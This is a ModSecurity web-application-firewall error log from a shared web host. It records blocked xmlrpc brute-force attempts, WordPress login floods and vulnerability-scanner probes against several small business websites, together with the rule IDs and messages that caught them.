[Tue May 26 19:27:00.789076 2026] [security2:error] [pid 49598:tid 49801] [client 91.245.236.124:55951] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmrOzJzkdc0WtdrwtTsQAAAM4"]
[Tue May 26 19:27:00.789199 2026] [security2:error] [pid 49598:tid 49801] [client 91.245.236.124:55951] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmrOzJzkdc0WtdrwtTsQAAAM4"]
[Tue May 26 19:27:01.017774 2026] [security2:error] [pid 49598:tid 49729] [client 20.192.3.167:5197] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/worksec.php"] [unique_id "ahWmrezJzkdc0WtdrwtTvQAAAIY"]
[Tue May 26 19:27:01.560391 2026] [security2:error] [pid 49598:tid 49769] [client 91.245.236.124:60081] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmrezJzkdc0WtdrwtT1QAAAK4"]
[Tue May 26 19:27:01.560537 2026] [security2:error] [pid 49598:tid 49769] [client 91.245.236.124:60081] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmrezJzkdc0WtdrwtT1QAAAK4"]
[Tue May 26 19:27:01.633434 2026] [security2:error] [pid 49598:tid 49751] [client 195.2.71.225:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWmrezJzkdc0WtdrwtT1gAAAJw"], referer: http://www.anujtradingco.com/blog-2/blog-boxed-bigtext/
[Tue May 26 19:27:02.008684 2026] [security2:error] [pid 49598:tid 49734] [client 20.192.3.167:10414] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-themes.php"] [unique_id "ahWmruzJzkdc0WtdrwtT5AAAAIs"]
[Tue May 26 19:27:02.151281 2026] [security2:error] [pid 49598:tid 49843] [client 195.2.71.225:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWmruzJzkdc0WtdrwtT5wAAAPg"], referer: http://anujtradingco.com/blog-2/blog-boxed-bigtext/
[Tue May 26 19:27:02.338670 2026] [security2:error] [pid 49598:tid 49738] [client 91.245.236.124:50101] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmruzJzkdc0WtdrwtT7AAAAI8"]
[Tue May 26 19:27:02.338829 2026] [security2:error] [pid 49598:tid 49738] [client 91.245.236.124:50101] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmruzJzkdc0WtdrwtT7AAAAI8"]
[Tue May 26 19:27:03.084296 2026] [security2:error] [pid 49598:tid 49831] [client 20.192.3.167:1040] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-signin.php"] [unique_id "ahWmr-zJzkdc0WtdrwtUBgAAAOw"]
[Tue May 26 19:27:03.103428 2026] [security2:error] [pid 49598:tid 49774] [client 91.245.236.124:61111] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmr-zJzkdc0WtdrwtUBwAAALM"]
[Tue May 26 19:27:03.103521 2026] [security2:error] [pid 49598:tid 49774] [client 91.245.236.124:61111] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmr-zJzkdc0WtdrwtUBwAAALM"]
[Tue May 26 19:27:03.370197 2026] [security2:error] [pid 49598:tid 49792] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmruzJzkdc0WtdrwtUAAAAAMU"]
[Tue May 26 19:27:03.866112 2026] [security2:error] [pid 49598:tid 49785] [client 91.245.236.124:10193] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmr-zJzkdc0WtdrwtUIgAAAL4"]
[Tue May 26 19:27:03.866230 2026] [security2:error] [pid 49598:tid 49785] [client 91.245.236.124:10193] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmr-zJzkdc0WtdrwtUIgAAAL4"]
[Tue May 26 19:27:04.101082 2026] [security2:error] [pid 49598:tid 49743] [client 20.192.3.167:14749] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-blog-header.php"] [unique_id "ahWmsOzJzkdc0WtdrwtUKgAAAJQ"]
[Tue May 26 19:27:04.645894 2026] [security2:error] [pid 49598:tid 49828] [client 91.245.236.124:46033] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmsOzJzkdc0WtdrwtUNwAAAOk"]
[Tue May 26 19:27:04.646041 2026] [security2:error] [pid 49598:tid 49828] [client 91.245.236.124:46033] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmsOzJzkdc0WtdrwtUNwAAAOk"]
[Tue May 26 19:27:05.408815 2026] [security2:error] [pid 49598:tid 49762] [client 91.245.236.124:49509] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmsezJzkdc0WtdrwtUUwAAAKc"]
[Tue May 26 19:27:05.408941 2026] [security2:error] [pid 49598:tid 49762] [client 91.245.236.124:49509] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmsezJzkdc0WtdrwtUUwAAAKc"]
[Tue May 26 19:27:05.606974 2026] [security2:error] [pid 49598:tid 49734] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmsezJzkdc0WtdrwtUTAAAAIs"]
[Tue May 26 19:27:05.635888 2026] [security2:error] [pid 49598:tid 49755] [client 208.91.198.85:23072] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rehobothindependentcare.com"] [uri "/wp-cron.php"] [unique_id "ahWmsezJzkdc0WtdrwtUXQAAAKA"]
[Tue May 26 19:27:06.193304 2026] [security2:error] [pid 49598:tid 49835] [client 91.245.236.124:40403] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmsuzJzkdc0WtdrwtUawAAAPA"]
[Tue May 26 19:27:06.193498 2026] [security2:error] [pid 49598:tid 49835] [client 91.245.236.124:40403] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmsuzJzkdc0WtdrwtUawAAAPA"]
[Tue May 26 19:27:06.972667 2026] [security2:error] [pid 49598:tid 49829] [client 91.245.236.124:28979] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmsuzJzkdc0WtdrwtUkgAAAOo"]
[Tue May 26 19:27:06.972790 2026] [security2:error] [pid 49598:tid 49829] [client 91.245.236.124:28979] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmsuzJzkdc0WtdrwtUkgAAAOo"]
[Tue May 26 19:27:07.574898 2026] [security2:error] [pid 49598:tid 49751] [client 4.241.228.159:2357] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.228.241.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWms-zJzkdc0WtdrwtUpQAAAJw"]
[Tue May 26 19:27:07.575034 2026] [security2:error] [pid 49598:tid 49751] [client 4.241.228.159:2357] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWms-zJzkdc0WtdrwtUpQAAAJw"]
[Tue May 26 19:27:07.739124 2026] [security2:error] [pid 49598:tid 49754] [client 91.245.236.124:11851] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWms-zJzkdc0WtdrwtUqQAAAJ8"]
[Tue May 26 19:27:07.739244 2026] [security2:error] [pid 49598:tid 49754] [client 91.245.236.124:11851] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWms-zJzkdc0WtdrwtUqQAAAJ8"]
[Tue May 26 19:27:07.848402 2026] [security2:error] [pid 49598:tid 49833] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWms-zJzkdc0WtdrwtUoQAAAO4"]
[Tue May 26 19:27:08.437292 2026] [security2:error] [pid 49598:tid 49820] [client 4.241.228.159:2359] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.228.241.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/admin.php"] [unique_id "ahWmtOzJzkdc0WtdrwtUwwAAAOE"]
[Tue May 26 19:27:08.437377 2026] [security2:error] [pid 49598:tid 49820] [client 4.241.228.159:2359] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/admin.php"] [unique_id "ahWmtOzJzkdc0WtdrwtUwwAAAOE"]
[Tue May 26 19:27:08.475850 2026] [security2:error] [pid 49598:tid 49823] [client 20.192.3.167:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "christinaspromotions.com"] [uri "/index.php"] [unique_id "ahWmsuzJzkdc0WtdrwtUhwAAAOQ"]
[Tue May 26 19:27:08.517500 2026] [security2:error] [pid 49598:tid 49788] [client 91.245.236.124:65051] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmtOzJzkdc0WtdrwtUxQAAAME"]
[Tue May 26 19:27:08.517612 2026] [security2:error] [pid 49598:tid 49788] [client 91.245.236.124:65051] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmtOzJzkdc0WtdrwtUxQAAAME"]
[Tue May 26 19:27:08.799607 2026] [security2:error] [pid 49598:tid 49791] [client 20.192.3.167:2290] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/ws.php"] [unique_id "ahWmtOzJzkdc0WtdrwtUzQAAAMQ"]
[Tue May 26 19:27:09.031550 2026] [security2:error] [pid 49598:tid 49649] [remote 118.70.190.36:44962] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.190.70.118.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmtOzJzkdc0WtdrwtUzwAA-zI"]
[Tue May 26 19:27:09.293597 2026] [security2:error] [pid 49598:tid 49808] [client 91.245.236.124:45023] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmtezJzkdc0WtdrwtU6AAAANU"]
[Tue May 26 19:27:09.293708 2026] [security2:error] [pid 49598:tid 49808] [client 91.245.236.124:45023] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmtezJzkdc0WtdrwtU6AAAANU"]
[Tue May 26 19:27:09.563317 2026] [security2:error] [pid 49598:tid 49655] [remote 118.70.190.36:44962] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.190.70.118.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmtezJzkdc0WtdrwtU6wAA_Dg"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:27:09.933982 2026] [security2:error] [pid 49598:tid 49762] [client 20.192.3.167:5228] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wsa.php"] [unique_id "ahWmtezJzkdc0WtdrwtU_AAAAKc"]
[Tue May 26 19:27:10.069816 2026] [security2:error] [pid 49598:tid 49822] [client 91.245.236.124:62123] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmtuzJzkdc0WtdrwtVAAAAAOM"]
[Tue May 26 19:27:10.069938 2026] [security2:error] [pid 49598:tid 49822] [client 91.245.236.124:62123] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmtuzJzkdc0WtdrwtVAAAAAOM"]
[Tue May 26 19:27:10.444439 2026] [security2:error] [pid 49598:tid 49744] [client 123.18.138.88:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmtezJzkdc0WtdrwtU_wAAAJU"]
[Tue May 26 19:27:10.551686 2026] [security2:error] [pid 49598:tid 49760] [client 4.241.228.159:2328] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.228.241.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/inputs.php"] [unique_id "ahWmtuzJzkdc0WtdrwtVEQAAAKU"]
[Tue May 26 19:27:10.551826 2026] [security2:error] [pid 49598:tid 49760] [client 4.241.228.159:2328] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "singhcouriercargo.com"] [uri "/inputs.php"] [unique_id "ahWmtuzJzkdc0WtdrwtVEQAAAKU"]
[Tue May 26 19:27:10.852090 2026] [security2:error] [pid 49598:tid 49846] [client 91.245.236.124:11915] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmtuzJzkdc0WtdrwtVIgAAAPs"]
[Tue May 26 19:27:10.852199 2026] [security2:error] [pid 49598:tid 49846] [client 91.245.236.124:11915] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmtuzJzkdc0WtdrwtVIgAAAPs"]
[Tue May 26 19:27:11.076604 2026] [security2:error] [pid 49598:tid 49745] [client 20.192.3.167:9967] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/w.php"] [unique_id "ahWmt-zJzkdc0WtdrwtVKQAAAJY"]
[Tue May 26 19:27:11.149342 2026] [security2:error] [pid 49598:tid 49657] [remote 18.190.7.192:49888] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmtuzJzkdc0WtdrwtVIwAA0To"]
[Tue May 26 19:27:11.628376 2026] [security2:error] [pid 49598:tid 49833] [client 91.245.236.124:20565] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmt-zJzkdc0WtdrwtVOAAAAO4"]
[Tue May 26 19:27:11.628511 2026] [security2:error] [pid 49598:tid 49833] [client 91.245.236.124:20565] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmt-zJzkdc0WtdrwtVOAAAAO4"]
[Tue May 26 19:27:12.264134 2026] [security2:error] [pid 49598:tid 49770] [client 20.192.3.167:13073] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/x.php"] [unique_id "ahWmuOzJzkdc0WtdrwtVUgAAAK8"]
[Tue May 26 19:27:12.317468 2026] [security2:error] [pid 49598:tid 49753] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWmt-zJzkdc0WtdrwtVRAAAAJ4"]
[Tue May 26 19:27:12.387221 2026] [security2:error] [pid 49598:tid 49772] [client 91.245.236.124:51653] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmuOzJzkdc0WtdrwtVWQAAALE"]
[Tue May 26 19:27:12.387316 2026] [security2:error] [pid 49598:tid 49772] [client 91.245.236.124:51653] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmuOzJzkdc0WtdrwtVWQAAALE"]
[Tue May 26 19:27:12.747745 2026] [security2:error] [pid 49598:tid 49676] [remote 103.174.152.203:54284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.152.174.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmuOzJzkdc0WtdrwtVWgAAoU0"]
[Tue May 26 19:27:13.164599 2026] [security2:error] [pid 49598:tid 49729] [client 91.245.236.124:40257] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmuezJzkdc0WtdrwtVdAAAAIY"]
[Tue May 26 19:27:13.164713 2026] [security2:error] [pid 49598:tid 49729] [client 91.245.236.124:40257] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmuezJzkdc0WtdrwtVdAAAAIY"]
[Tue May 26 19:27:13.714071 2026] [security2:error] [pid 49598:tid 49666] [remote 103.174.152.203:54284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.152.174.103.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWmuezJzkdc0WtdrwtVhAAA9UM"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:27:13.862125 2026] [security2:error] [pid 49598:tid 49739] [client 20.192.3.167:13103] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/xx.php"] [unique_id "ahWmuezJzkdc0WtdrwtViQAAAJA"]
[Tue May 26 19:27:13.928479 2026] [security2:error] [pid 49598:tid 49809] [client 91.245.236.124:39279] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmuezJzkdc0WtdrwtVjAAAANY"]
[Tue May 26 19:27:13.928573 2026] [security2:error] [pid 49598:tid 49809] [client 91.245.236.124:39279] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWmuezJzkdc0WtdrwtVjAAAANY"]
[Tue May 26 19:27:14.022663 2026] [security2:error] [pid 49598:tid 49737] [client 4.241.228.159:2348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 159.228.241.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "singhcouriercargo.com"] [uri "/file.php"] [unique_id "ahWmuuzJzkdc0WtdrwtVjgAAAI4"]
